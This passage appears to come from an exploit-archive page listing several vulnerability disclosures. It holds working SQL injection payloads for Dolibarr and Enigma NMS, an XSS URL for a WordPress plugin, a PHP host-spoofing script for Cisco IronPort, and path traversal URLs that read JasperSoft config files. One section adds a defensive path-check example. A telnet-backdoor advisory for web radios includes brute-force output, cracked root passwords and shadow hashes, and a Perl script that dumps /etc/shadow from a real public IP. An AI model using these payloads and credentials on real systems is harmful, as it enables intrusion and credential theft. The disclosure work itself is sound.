token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO'
AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)--
jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product&note=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save

.
.
.
.
.

demand_reason_id, availability_id (POST) - Sql injection PoC

http request:

POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals
Content-Type: application/x-www-form-urlencoded
Content-Length: 471
Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty



Parameter: demand_reason_id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28
END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0
OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

.
.

Parameter: availability_id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28
END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT
(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0
AND (SELECT 9904 FROM
(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR&note_public=&note_private=&createmode=empty

Enigma NMS 65.0.0 SQL Injection


Enigma NMS version 65.0.0 suffers from a remote SQL injection vulnerability.


MD5 | e342a98c9659608a938a2f109885a261

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS search_pattern SQL Injection #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16065 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
_ _
___ (~ )( ~)
/ \_\ \/ /
| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
| D _]/\ \ -= We all have something to hide =-
\___/ / /\ \\
(_ )( _)
@Xerubus

Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
Vulnerable Parameter: search_pattern (GET)
Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='

Dolibarr ERP-CRM 10.0.1 SQL Injection


Dolibarr ERP-CRM version 10.0.1 suffers from a remote SQL injection vulnerability.


MD5 | 651b98a10f6da22baa060c0ef8e1faff

# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business...
==================================================================


elemid (POST) - Sql injection PoC


POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
Connection: close
Upgrade-Insecure-Requests: 1

token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]



Parameter: elemid (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
(ELT(7549=7549,1))),0x7176787a71))

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)

WordPress Qwiz Online Quizzes And Flashcards 3.36 Cross Site Scripting


WordPress Qwiz Online Quizzes and Flashcards plugin version 3.36 suffers from a cross site scripting vulnerability.


MD5 | 43cfec9d6bcd3914fe0fcd5cab321229

Class Input Validation Error
Remote Yes

Credit Ricardo Sanchez
Vulnerable Qwiz online quizzes and flashcards 3.36

Qwiz online quizzes and flashcards is prone to a reflected cross-site
scripting vulnerability because it fails to sufficiently sanitize
user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.
To reproduce the issue: the XSS is reflected because the value supplied in the URL is not filtered correctly.

Demo Request GET:
http://localhost/wordpress/wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(%22R1XS4.COM%22)%3C/script%3E



Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification


Cisco Content Security Virtual Appliance M380 IronPort remote cross site host modification demo exploit.


MD5 | a98fd2e94251ea2edc1d831fe438607d

<?php
//
// Cisco Content Security Virtual Appliance M380 IronPort Remote Cross Site Host Modification Demo Exploit
//
//
// Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
//
//
// Disclaimer:
// This or previous programs are for Educational purpose ONLY. Do not use it without permission.
// The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
// caused by direct or indirect use of the information or functionality provided by these programs.
// The author or any Internet provider bears NO responsibility for content or misuse of these programs
// or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
// system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
// responsibility.
//
// Use them at your own risk!
//
//
// [test@localhost ironport]$ php -S localhost:1337 ironport_m380.php
// PHP <HIDDEN> Development Server started at Sun Sep 8 16:47:43 2019
// Listening on http://localhost:1337
// Document root is /home/test/ironport
// Press Ctrl-C to quit.
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * Initializing NSS with certpath: sql:/etc/pki/nssdb
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:47:59 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=InCkP0xGNg7fyAqL2mAO; expires=Tuesday, 10-Sep-2019 13:47:59 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:47:59 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:47:59 GMT
// < Location: https://scam-page.com/login?CSRFKey=c17fd622-f031-f0e0-2cab-2854acb4a443&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
// * About to connect() to 192.168.1.1 port 443 (#0)
// * Trying 192.168.1.1... * connected
// * Connected to 192.168.1.1 (192.168.1.1) port 443 (#0)
// * skipping SSL peer certificate verification
// * SSL connection using TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
// * Server certificate:
// * subject:
// * start date: Mar 19 00:00:00 2018 GMT
// * expire date: Mar 18 23:59:59 2020 GMT
// * common name:
// * issuer:
// > GET / HTTP/1.1
// Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
// Cache-Control: no-cache
// Content-Type: application/x-www-form-urlencoded; charset=utf-8
// Host: scam-page.com
// Referer: scam-page.com
// User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
//
// * HTTP 1.0, assume close after body
// < HTTP/1.0 303 Redirecting
// < Server: glass/1.0 Python/2.6.4
// < Date: Sun, 08 Sep 2019 13:48:00 GMT
// < Content-Type: text/html
// < X-Frame-Options: SAMEORIGIN
// < Set-Cookie: sid=NPPfo6uXJ5gPbJSPcNDE; expires=Tuesday, 10-Sep-2019 13:48:00 GMT; httponly; Path=/; secure
// < Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
// < Pragma: no-cache
// < Expires: Sun, 08 Sep 2019 13:48:00 GMT
// < Last-Modified: Sun, 08 Sep 2019 13:48:00 GMT
// < Location: https://scam-page.com/login?CSRFKey=32b0b069-34bb-1fdf-9f92-2de72a24cb65&referrer=https%3A%2F%2Fscam-page.com%2FSearch
// <
// * Closing connection #0
//


$url = "https://192.168.1.1";
$fake_host = "scam-page.com";
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, true);
$headers = [
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Cache-Control: public',
'Content-Type: application/x-www-form-urlencoded; charset=utf-8',
'Host: '.$fake_host,
'Referer: '.$fake_host,
'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$output = curl_exec($ch);
curl_close($ch);
echo $output;

Tibco JasperSoft Path Traversal


Tibco JasperSoft suffers from a path traversal vulnerability.


MD5 | 62459214a2910a0ea52b25ecde2d21d8

Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
The vulnerability is in the reportresource/reportresource/ service, in the
resource parameter. There is a "defence": the value of the resource param
must start with net/sf/jasperreports/.

Exploitable by remote, unauthenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties
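
The prefix rule fails because the string is tested before the `..` segments are resolved. The following added example (not TIBCO's code and not from the advisory) contrasts that check with one that normalises first and then confirms the resolved file still sits under the allowed prefix; modelling resources as files under a directory root, and the function names, are assumptions.

```python
import os
import posixpath
import tempfile

ALLOWED_PREFIX = "net/sf/jasperreports/"  # prefix quoted in the advisory


def naive_check(resource):
    """The 'defence' as the advisory describes it: a raw string-prefix test."""
    return resource.startswith(ALLOWED_PREFIX)


def normalised_check(resource):
    """Collapse '.' and '..' segments first, then apply the same prefix rule."""
    if "\x00" in resource or "\\" in resource or resource.startswith("/"):
        return False
    collapsed = posixpath.normpath(resource)
    # normpath keeps leading '..' on relative paths, so an escape stays visible.
    return collapsed.startswith(ALLOWED_PREFIX)


def resolve_under(root, resource):
    """Return the real path of an accepted resource under root, else None.

    Assumption: resources are modelled as files below `root`; the realpath
    comparison additionally catches symlinks that point outside the prefix.
    """
    if not normalised_check(resource):
        return None
    base = os.path.realpath(os.path.join(root, ALLOWED_PREFIX))
    target = os.path.realpath(os.path.join(root, resource))
    if os.path.commonpath([base, target]) != base:
        return None
    return target if os.path.isfile(target) else None


def demo():
    """Run both checks over the advisory's two values plus one benign name."""
    samples = [
        "net/sf/jasperreports/web/app.js",                      # constructed, benign
        "net/sf/jasperreports/../../../../",                    # from the PoC
        "net/sf/jasperreports/../../../../js.jdbc.properties",  # from the PoC
    ]
    with tempfile.TemporaryDirectory() as root:
        # Constructed stand-in tree: one servable file, one file outside the prefix.
        web = os.path.join(root, "net", "sf", "jasperreports", "web")
        os.makedirs(web)
        for path in (os.path.join(web, "app.js"),
                     os.path.join(root, "js.jdbc.properties")):
            with open(path, "w") as handle:
                handle.write("constructed sample\n")
        return [(s, naive_check(s), resolve_under(root, s) is not None)
                for s in samples]


if __name__ == "__main__":
    for name, naive, hardened in demo():
        print(f"{name!r}: prefix-only={naive} normalised+resolved={hardened}")
```

All three values pass the prefix-only test; only the benign name passes the normalised and resolved check.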

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to security@tibco.com
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is it going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they treat everyone
equally and as no fix is available for their customers, they can not fix
their own site also.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# More detailed description is available in blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com



Dabman And Imperial Web Radio Devices Undocumented Telnet Backdoor


Dabman and Imperial Web Radio Devices suffer from undocumented telnet backdoor and command execution vulnerabilities.


MD5 | 567733faadd3778344d62d56d63508e5

Document Title:
===============
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor
& Command Execution Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2183

Video: https://www.vulnerability-lab.com/get_content.php?id=2190

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474

CVE-ID:
=======
CVE-2019-13473


Release Date:
=============
2019-09-09


Vulnerability Laboratory ID (VL-ID):
====================================
2183


Common Vulnerability Scoring System:
====================================
9.4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
Since 1993, TELESTAR has been synonymous with quality and a very good
price/performance ratio in the consumer electronics segment.
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for
digital TV reception via satellite (DVB-S), cable (DVBC)
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region
of Germany. The product portfolio includes digital receivers
and the latest generation of television sets as well as modern
distribution and single-cable technology, satellite to IP reception
solutions and radio transmission systems. The product range is rounded
off by Germany's most comprehensive range of accessories
for digital television reception.

(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )


Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered multiple
vulnerabilities in the dabman and imperial web radio devices series (typ
d & i).


Vulnerability Disclosure Timeline:
==================================
2018-06-01: Researcher Notification & Coordination (Security Researcher)
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security
Department)
2018-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Coordinated Disclosure


Technical Details & Description:
================================
1.1
The Dabman and Imperial web radio series (type d & i) suffers from a
weak password vulnerability.
The vulnerability allows local and remote attackers to compromise the
web radio's entire embedded Linux BusyBox OS.

The vulnerability is located in an undocumented telnet service
(telnetd) of the Linux BusyBox system, which is permanently turned on.
The telnetd service uses weak passwords with hardcoded credentials on
the embedded Linux BusyBox of the internet radio devices. The telnet
password can be cracked with simple manual password brute-force
techniques or with basic automated scripted attacks (e.g. ncrack).
Once the password is known, a remote or local network attacker can log
in to the internet radio device without authorization and use the
embedded Linux BusyBox operating system.

Once logged in as the root user, the attacker can open the /etc/ path
and cat gshadow, shadow and the conf files.
In the end the attacker has full root access to the BusyBox system
(telnetd), can access the web server (httpd) as admin and can see the
wireless LAN and its unencrypted key in ./flash/ - wifi.cfg.
A demo exploit PoC is available in the wild.

Vulnerable Protocol(s):
[+] telnetd

System(s):
[+] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)
(Debian Linux PreRelease - ARM 3.3.2)

Firmware Version(s):
[+] TN81HH96-g102h-g102

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


1.2
The Dabman and Imperial web radio series (type d & i) suffers from a
command execution vulnerability.
The vulnerability allows local and remote attackers to send
unauthorized, unauthenticated commands to compromise the web radio
devices.

The vulnerability is located in the httpd web server communication on
ports 80 and 8080. Local and remote attackers can send basic GET
commands with basic command line tools (e.g. curl or modhttp) to modify
or manipulate HTTP requests. The attacker can also capture the HTTP
AirMusic commands to reverse engineer the radio device for unauthorized
interactions. The system has no protection mechanism to block the
unauthorized transmission of commands. The web radio also has no
authentication or reminder mechanism to ensure that only allowed or
trusted sources (client, system, MAC, auth ...) can transmit commands.

Vulnerable Protocol(s):
[+] httpd

Module(s):
[+] UIData (Web UI on 80 or 8080)

Function(s):
[+] /set_dname
[+] /mylogo
[+] /LocalPlay
[+] /LocalPlay
[+] /irdevice.xml
[+] /Sendkey
[+] /setvol
[+] /hotkeylist
[+] /init
[+] /playlogo.jpg
[+] /stop
[+] /exit
[+] /back
[+] /playinfo

Parameter(s):
[+] ?name=PWND
[+] ?url=./*.jpg
[+] ?url=/stream.wav&name=*
[+] ?url=/msg.wav&save=*
[+] ?key=*
[+] ?vol=*0&mute=*
[+] ?language=*

Affected Function(s):
[+] Air Music Controls

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


Proof of Concept (PoC):
=======================
1.1 Undocumented Telnet Service (telnetd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or a privileged user account.
To demonstrate or reproduce the issue, follow the information and
steps below.


Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]
Discovered open port 8080/tcp on 93.234.141.215
Discovered open port 80/tcp on 93.234.141.215
Discovered open port 23/tcp on 93.234.141.215
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018
(93.234.141.215)
NSE: Script scanning 93.234.141.215.
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Host is up (0.010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet security DVR telnetd (many brands)
80/tcp open tcpwrapped
|_http-title: AirMusic
8080/tcp open http BusyBox httpd 1.13
| http-methods:
|_ Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:\Program Files (x86)\Ncrack>ncrack -v --user root 93.234.141.215:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropäische Sommerzeit
Discovered credentials on telnet://93.234.141.215:23 'root''password'
Discovered credentials on telnet://93.234.141.215:23 'root''password1'
Discovered credentials on telnet://93.234.141.215:23 'root''password2'
Discovered credentials on telnet://93.234.141.215:23 'root''password123'
Discovered credentials on telnet://93.234.141.215:23 'root''password12'
Discovered credentials on telnet://93.234.141.215:23 'root''password3'
Discovered credentials on telnet://93.234.141.215:23 'root''password!'
telnet://93.234.141.215:23 finished. Too many failed attemps.
Discovered credentials for telnet on 93.234.141.215 23/tcp:
93.234.141.215 23/tcp telnet: 'root''password'
93.234.141.215 23/tcp telnet: 'root''password1'
93.234.141.215 23/tcp telnet: 'root''password2'
93.234.141.215 23/tcp telnet: 'root''password123'
93.234.141.215 23/tcp telnet: 'root''password12'
93.234.141.215 23/tcp telnet: 'root''password3'
93.234.141.215 23/tcp telnet: 'root''password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.


System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)

Kernel:
9)20151217_M8_TFT_7601_Kernel

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian
prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes


Built-in commands:
. : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait

Currently defined functions:
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,
login,
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,
route,
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
udhcpd, umount, unlzma, usleep, zcat


Username: root
Password: password & password!

shadow
root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey)
ftp:!:0:::::: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)

gshadow
root:::root,mldonkey


PoC: Exploit
use Net::Telnet ();
use Cwd;
$file="inputLog.txt";
$ofile="outputlog.txt";

# For local network change to localhost or local ip
@hosts = ("93.234.141.215");

foreach $hostip (sort @hosts)
{
$t = new Net::Telnet (Timeout => 10,
Input_log => $file,
Prompt => "/>/");
print "\n\nConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...\n";
print "\n\nAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600\n";
$t->open("$hostip");
$t->login("root","password");
my @lines = $t->cmd('cat /etc/shadow');
print "$hostip: Directories:\n";
print "@lines \n";
$t->close;
}



1.2 AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or a privileged user account.
To demonstrate or reproduce the issue, follow the information and
steps below.

AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080

Note: Attacks can be performed in the local network (Localhost:80) or
remotely by requesting the URL with the remote IP address
